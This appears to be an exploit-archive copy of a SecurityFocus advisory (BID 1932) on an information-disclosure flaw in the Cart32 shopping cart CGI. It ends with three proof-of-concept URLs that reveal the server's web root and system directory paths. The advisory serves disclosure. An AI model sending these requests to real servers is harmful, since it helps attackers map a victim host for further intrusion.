11 lines
No EOL
596 B
Text
11 lines
No EOL
596 B
Text
source : https://www.securityfocus.com/bid/1932/info
|
|
|
|
Cart32 is a shopping cart application for e-commerce enabled sites.
|
|
|
|
Cart32 contains a vulnerability which reveals server information. Requesting a specially crafted URL, by way of the CGI application, will reveal the physical path to the web root as well to the Windows and Program files directory.
|
|
|
|
Successful exploitation of this vulnerability could assist in further attacks against the victim host.
|
|
|
|
http://target/cgi-bin/cart32.exe/error
|
|
http://target/cgi-bin/c32web.exe/ShowAdminDir
|
|
http://target/cgi-bin/c32web.exe/CheckError?error=53 |